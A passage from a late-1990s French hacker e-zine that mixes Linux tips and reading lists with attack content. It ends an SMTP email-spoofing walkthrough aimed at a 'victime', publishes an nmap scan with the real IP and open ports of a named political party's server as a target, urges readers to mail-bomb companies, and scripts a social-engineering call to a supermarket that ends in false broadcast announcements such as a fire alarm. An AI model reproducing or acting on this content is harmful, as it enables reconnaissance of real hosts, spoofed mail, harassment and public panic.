Les UHC697 et LES MN sont TOUS des gros LAMERS DE MERDE!!!! 
signé: membre des MN QUI VOUS FUCK!!! Baande de copieurs-colleurs... 
. 
Réponse du serveur: 
250 KAA07652 Message accepted for delivery(Et voila! le message arrivera dans 
quelques minutes à votre victime!) 
Répondez: 
quit 

Note: Vous pouvez mettre autant de [rcpt to:] que nécessaire avant le data.

------------------------------------------------------------------------------
*19************************** Le scan du moment ******************************
----------------------------------| 3D13 |------------------------------------
Il s'agit du celebre...Front national, ce putain de FN,

site : www.front-nat.fr		IP : 209.130.76.129
ping : entre 200 et 300 ms      machine : apache1.3.4 frontpage

liste des principaux ports ouverts (resultat donne par nmap) :
NB : Nmap examine le fichier /etc/services
7    -> tcp/udp, echo
21   -> tcp, File Transfer [Control]
22   -> tcp, ssh
25   -> tcp, smtp (Simple Mail Transfer Protocol)
80   -> tcp, http/www-http
110  -> tcp, pop3 (Post Office Protocol - Version 3)
443  -> tcp, https
823  -> tcp, inconnu
1672 -> tcp, netview-aix-11
1972 -> tcp, intersys-cache

Je penses que leur machine tourne sous unix car le port 22 est open et comme
le port 139 n'est pas ouvert, nous ne sommes pas sous windows.
Cependant, il reste d'autres sytemes : MAC, Bell ou Novell Netware...
Je part dans l'hypothese qu'ils tournent sur une machine unix (prononcez
iounixe).

Note additionnelle : Ce passage est un extrait du manuel du pirate, thh.txt
qui est en cours d'ecriture par moi-meme.
voici le somaire allechant de ce manuel :

PARTIE I : Contexte
  I) Les hackers
	1°) Qui sont-ils ?
	2°) Que font-ils ?
	3°) Les plus connus...
  II) Les crackers
	1°) Qui sont-ils ?
	2°) Que font-ils ?
	3°) Les plus connus...
  III) Les phreakers
	1°) Qui sont-ils ?
	2°) Que font-ils ?
	3°) Les plus connus...
  IV) Les differents types de pirates
	1°) Le lamer ou lamerz
	2°) Le newbie
	3°) L'Elite ou E
  IV) Le vocabulaire a acquerir

PARTIE II : La theorie en passant par la pratique
  I) Le TCP/IP
  II) Telnet
  III) Les outils utilises
	1°) Les scanners
	2°) Les compilateurs
	3°) Les techiques de destructions
	4°) S'informer sur le serveur
	     a. Ping
	     b. Finger
  IV) Le cracking
  V) Le phreaking
  VI) Les e-zines underground
	1°) Francais
	2°) Americains
  VII) Les liens vers les sites de H/P/C/V
  VIII) Les differents types de hacking
	1°) L'IP Spoofing
	2°) L'espionnage de trames
	3°) Le S.E.
	4°) Le ping de la mort (ping of death)
	5°) Attaque frontale
	6°) Le cheval de troie
  IX) La cryptographie
  X) Les differentes plates-formes (OS)
	1°) Windows
	2°) Unix/Linux
	3°) Mac
	4°) Novell Netware
  XI) Le Bust
	1°) Avant de se faire buster, les pieges a eviter
	2°) Que faire si vous vous faites buster ?
  XII) Conclusion

J'en suis environ a la page 50 dans la redaction de ce manuel, et je suis loin
d'avoir fini. Affaire a suivre donc sur www.madchat.org ou cybz.virtualave.net

------------------------------------------------------------------------------
*20******************** Mailboom: soyez intelligent **************************
----------------------------------| 3D13 |------------------------------------

Si il y a une technique merdique sur tout le net, c'est bien celle la : le
mail-boom.
Dire qu'il existe encore des pauvres mecs qui se croyent hacker, alors qu'il
savent tout juste se servir d'un mail-boom ou d'un nuker.
En fait, pour etre precis, le mail boom est utilise par (en general), de
enfants d'environ 12-14 ans, mais il y en a qui s'en serve encore a 17,18 ou
20 ans, et se croyent genies, hackers talentueux, je crois meme que leur QI
est inferieur a la moyenne, vu que ces outils sont utilises par des enfants !!
Ca revient a dire qu'un personne sait programmer, alors que pour faire ces
virus, elle utilise "Virus Labo", un generateur de virus.
Ces outils ne font pas appel a des techniques tres perfectionnees. Ils sont
plutot employes par des utilisateurs immatures, des employes mecontents ou
des jeunes. Neanmoins il existent bel et bien et sont utilises au detriment de
la communaute informatique.
La seule raison pour laquelle j'ai rien contre le mail-bombing, c'est contre
les spams, vous savez, ces societes qui vous envoyent des pubs sur votre
e-mail, eh bien moi je deteste ca, donc, apres avoir recu un gentil message
publicitaire de ces societes, envoyez leur 5 mail-bombs, ce n'a l'air de rien,
mais si tout le monde en envoie 5, ca fera beaucoup.

------------------------------------------------------------------------------
*21********************** Linux pratique (partie 1) **************************
----------------------------------| 3D13 |------------------------------------

Ah, vous l'avez sur un cdrom car vous lisez des livres qui se lisent avec les
yeux et le gentil editeur vous propose une version de linux sur 1..2..3 cdroms.
Et vous vous dites : "j'ai envie de l'installer car j'ai lu le 24e article de
l'e-zine 3d13", yeah!!!, dans ce cas, installez le vite, je vais vous decrire
vitre fait comment ca marche, car il faut l'avouer, une installation de linux
est souvent chaotique, quoique, j'y suis bien arrive tout seul. Il y a
plusieurs versions sur le marche, choisissez la votre, vous n'etes pas force
de prendre la RedHat, meme si c'est la plus connue, il y en a d'autres, par
exemple, ma preferee a moi, c'est la Suse 6.1 et avant c'etait la "Developer's
resource" d'Infomagic.
Pour commencer, il faut donc creer une (ou deux) disquette(s) d'amorcage,
quelques fois, vous pourrez initialiser l'installation a partir d'un cdrom.
Vous initialiserez ensuite l'installation, et vous creerez vos deux partitions
linux, une native et une swap. La, vous installerez en suivant les procedures
d'installation.
A la fin de l'installation, on doit vous demander un mot de passe pour le
root, tapez ce que vous voulez tant que vous ne l'oubliez pas. Ensuite, apres
une installation avec succes, vous rebooterez la machine et si vous naviguez
entre 2 OS, vous devrez normalement avoir choisi d'installer LILO (LInux
LOader) et vous tapez "linux" ou "dos" si vous tournez avec windows. 

Note : Windows ne sait pas lire une partition linux mais linux sait lire une
partition windows.

vous devrez voir apparaitre a l'ecran : "login :", tapez ici "root" et ensuite
"password", tapez ici le mot de passe choisi a l'installation.
Maintenant, on passe a la pratique : 
sous linux, les disques ne s'appellent pas A,B,C,D ou E... mais le nom que
vous voulez, en general je choisis cdrom pour mon lecteur de cd, floppy pour
ma disquette et hd pour la partie de mon disque dur tounant sous windows.
Et pour pouvoir acceder a ces disques, il faut les monter, par exemple,
inserez une disquette formattee DOS dans votre lecteur et tapez :

mount /dev/fd0 /mnt/floppy
cd /mnt/floppy
ls
et si vous avez beaucoup de fichier, tapez "ls |more"

pour votre cdrom, tapez (dans mon cas, sinon, remplacez hdc par hdb, hdd, hde)
mount /dev/hdc /mnt/cdrom

enfin, pour acceder a la partie de windows de votre disque dur, il va falloir
creer le repertoire caril est pas cree par defaut, tapez :
mkdir /mnt/hd
puis, on monte tout ca :
mount /dev/hda1 /mnt/hd (en remplacant le hda1 par hda2, hda3 pour le n° de
partition)
et pour demonter, tapez
umount /mnt/hd
umount /mnt/cdrom
umount /mnt/floppy

ATTENTION, l'erreur frequente est de taper unmount au lieu de umount.
Comme je vous ait deja donne quelques notions d'unix, c'est pas la peine de
les rappeller ici, relisez les precedents numeros.

------------------------------------------------------------------------------
*22****************** Liste des livres interessants **************************
----------------------------| Hitchy & 3d13 |---------------------------------

C'est hitchy qui a ecrit cet article, j'ai juste voulu rajouter quelques 
bouquins de ma collection, voici son article :

[HITCHY]
On ne devient pas un hacker en faisant juste de l'ordinateur toute la journée 
et que meme mitnick a lu des livres!!! (Ils coutent tous tres cher mais dans
pas  lomgtemps j'expliquerais comment avoir la bible Linux à 99 francs
neuve!!!:-))) 

   1."La bible Linux" chez Micro Applications. 
   2."Sécurité et protections" tj chez Micro Applications. 
   3."Initiation à la cryptographie" chez Dunod 
   4."Le PC" chez S&SM 
   5."Les résaux" en poche chez S&SM 
   6."L'assembleur facile" chez Marabout 
   7."Dictionnaire de l'internet et de l'intranet" chez Marabout 
   8."TCP/IP en poche chez S&SM" 
Je pense qu'il y a des livres tres bien que peut de monde connaise.
[FIN MESSAGE DE HITCHY]

[3D13]
Voila ce que j'ai a rajouter :
Linux est bien car c'est le seul systeme unix que le public peut se procurer,
avec ce systeme, vous pourrez donc compiler beaucoup de programmes sources
crees a la base pour unix (mais pas tous), je dit pas tous car, par exemple,
SATAN qui a ete cree sous unix ne se compile pas sous Linux et il faut se
procurer la version pour linux (qui existe:voir 3d13#1).
Il faut pas avoir linux pour frimer devant ses potes, c'est ridicule, vous
avez le droit de l'utiliser, par exemple, je tape ce texte sous vi tout
en ecoutant un CD, j'utilise le tableur/tratement de texte d'applix.
Donc, si vous avez envie de l'installer, mais surtout de l'utiliser, un tres
bon bouquin : La bible Linux chez Micro Applications.
Pour l'assembleur, cela vous aidera pour realiser vos propres cracks, ou bien,
cree vos propres routines pour un programme que vous etes en train de faire,
demandez : PROGRAMMER EN ASSEMBLEUR SUR PC, edition Micro applications, par
Holger SCHAKEL, prix 225 F avec la disquette 3"1/2. (non, j'ai pas un contrat
avec micro application, mais il y a quand meme quelques livres incontournables
chez cet editeur).
Le sublime "Securite optimale", chez S&SM.
Tous les livres notes ressources d'experts, chez S&SM sont excellents, lisez
les sans hesiter, mais ils coutent environ 400 F !!!
Pour rajouter encore un truc, Kevin Mitnick (rrrrrrraaaaaahhhhh %-P) ne lisait
non pas que des livres mais aussi et surtout des notes d'informations, je
vais vous donner quelques listes de diffusions, mais avant de vous inscrire
a toutes les listes, vous devez savoir que vous pouvez (si vous etes partout)
facilement recevoir 30 Mb de donnees pas mois, donc, soyez inscrit a une ou
deux, mais pas trop, voici les listes accompagnees d'une courte description :

8lgm-list-request@8lgm.org : Uniquement des failles majoritairement sur UNIX
coast-request@cs.purdue.edu : Failles et discutions sur les outils (svnt UNIX)
www-security-request@nsmx.rutgers.edu : Failles sur le www
Sneakers@CS.Yale.EDU : Methodes d'instrusion par l'exploitation de failles et
d'outils connus.

------------------------------------------------------------------------------
*23************** Prenez les commandes d'un supermarche **********************
--------------------------------| Hitchy |------------------------------------

   Vous etes a carrefour ou une conneries de supermarche a deux balles et
o soudain vous voyez un "telephone" enfin theoriquement c'en est un mais    
en fait ca sert a contacter un hotesse pour poser toute sortes de questions   
 tres interressante comme "Combien coute les cacahuetes?"etc....     
Grace a un peu de S.E on va peut-etre reussir a faire passer un message dans 
tout le magasin: Vous décrochez 
- Service de merde carrefour
- Bonjour, que puis je faire pour vous?     
- Oui,ici Marc du service informatique j'ai un petit problème car je ne suis 
nouveau ici et je voudrais passer un message pour joindre un gerant car un 
client a une plainte a faire, mais personne ne m'a informe du prefixe ou de
 la demarche a suivre pour passer un message dans le magasin!     
- Alors il faut faire ...................     
- Merci beaucoup, vous etes libre ce soir? 

   Bon maintenant que vous savez se qu'il faut faire vous avez qu'a balancer 
   des conneries comme: 
   "Nous informons notre aimable clientele que Pamela Anderson est en train 
   de signer des autographes à l'entre du magasin" 
   "AU FEU! AU FEU!" 
   "Nous informons notre aimable clientele qu'il doive se munir de leur roulo 
   de pq si il veulent aller au toilette" 

------------------------------------------------------------------------------
*24************** Linux, pourquoi il faut l'installer ? **********************
----------------------------------| 3D13 |------------------------------------

Vous n'avez pas le temps de jouer ? vous etes lasses par les fonctions de DOS
et de Windows, vous les connaissez plus que par coeur, vous aimez
l'informatique et vous voulez progresser ? vous avez un graveur ? un
scanner ? vous voulez faire de la retouche, naviguer sur internet sans avoir
le risque d'etre facilement pirate ? Vous avez envie de jouer a Hopkins FBI ?
contribuer a l'elaboration de projets ? pouvoir surfer sans avoir a etre
espionne par windows ou internet explorer ? vous avez peur que
l'administration francaise vous poursuive ? regarde ce que vous avez sur vos
disques durs ? vous etes un programmeur ?
si vous repondez oui a l'une de ces questions (j'en ais oublie plein, desole
les linuxiens avertis si vous en connaissez d'autres) alors linux est fait
pour vous.
Pour commencer, equipez vous de la Red Hat 6.0 ou de la Suse 6.1, lisez le
manuel pour l'installation. Pourquoi je vous indique l'une de ces
distributions ? parce qu'elle sont tres tres completes, mais il en existe
plein d'autres, trouvez la votre. Un tres bon magazine francais existe : linux
magazine, un mine d'informations.
C'est aussi vrai que si vous etes un gros joueur, linux n'est pas fait pour
vous. Certes, il existe quelques jeux sympas, mais les jeux commerciaux
peuvent se compter sur les doigts de la main, par contre, ca commence a venir,
grace a "Hopkins FBI","Quake 3"(qui est pas encore sortit),"Doom",...ca arrive
doucement mais ca arrive.
Je vous conseille d'installer KDE (pour l'instant, la 1.1.1 est sortit), c'est
une interface et un ensemble d'outils disponibles, tel que kicq (et oui, icq
sous linux, ca existe).
Pour votre graveur, vous avez Keasy CD ou Kreate CD.
Kirc pour discuter existe aussi, bref, vous retrouvez tout ce dont vous aurez
put penser perdre en installant linux et que vous aviez sous windows. Non,
quasiment tous vos programmes existent, ou sont a l'etat de projet.
Vous aimez le mp3 (pirates! c'est honteux!), il existe x11amp, qui fait comme
winamp.
Netscape navigator est inclus (les memes versions que windows).
Vous etes un cracker fou ? desole pour vous, plus besoin de decompiler vos
programmes puisqu'ils sont fournis avec la source et sont tous du domaine
public (sauf staroffice, hopkins fbi, et les autres produits commerciaux,
mais ils restent gratuits), vous allez donc etre au chomage. Hackers ?
bienvenue dans votre paradis, vous avez tout ce qu'il vous faut. Programmeurs
? tous les langages sont disponibles, C ? C++ ? pascal ? lisp ? assembleur ?
fortran ? ada ? agol ? basic ? .... la liste est longue, il y a meme les
outils de lex et yacc pour creer un compilateur. En conclusion, n'hesitez pas
a passer sous linux, meme si a peut etre dur au debut, perseverez. Si
vous etes un joueur, attendez encore un peu, sinon, QU'ATTENDEZ VOUS POUR
L'INSTALLER DES MAINTENANT ?

------------------------------------------------------------------------------
*25************************* Le mot 2 la faim ********************************
------------------------------------------------------------------------------

Je pense recevoir peut etre la critique du fait que mon e-zine est peut etre
trop oriente linux, je suis d'accord, mais c'est une plate-forme geniale et en
plus, beaucoup d'utilitaires Unix fonctionnent dessus donc c'est l'ideal. Je
vous conseille tres vivement de l'installer car c'est un systeme d'avenir. 
Donnez vos idees, vos critiques afin d'ammeliorer cet e-zine qui est loin
d'etre parfait. Je vous rappelle que je suis a la recherche d'un phreaker et
d'un chimiste...
Le prochain e-zine sortira certainnement plus tardivement car vous pourrez
bientot lire un manuel du pirate, que je veux le plus complet possible et un
manuel d'unix/linux.
Je vous rappelle mon e-mail : 3d13@usa.net, je ne repondrais desormais plus
aux e-mails, je les lirais certainnement, la reponse des e-mails que vous
m'envoyez seront re-ecrits ici avec une reponse. Ce n'est pas pour autant que
vous ne pouvez pas m'ecrire ou me joindra par ICQ :  38328109.
@+


Un coucou :-) a : CYBZ (pour sa sympathie) - LEONARD (pour son site) -       
                  LEFTY (pour sa participation) - WOODIE (pour sa connerie) - 
                  BIGFOOT (pour son terrorisme) - Tha|\|aTosE (pour ses e-mails
                  marrants a lire)- TUROKIII (pour etre le frere de la soeur  
                  de quelqu'un) - Kelly (pour sa gentilesse d'etre une femme 
                  hackeuse) - Boulibang (pour je sais pas quoi)..encore plein  
                  d'autres que j'ai pas en tete.

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
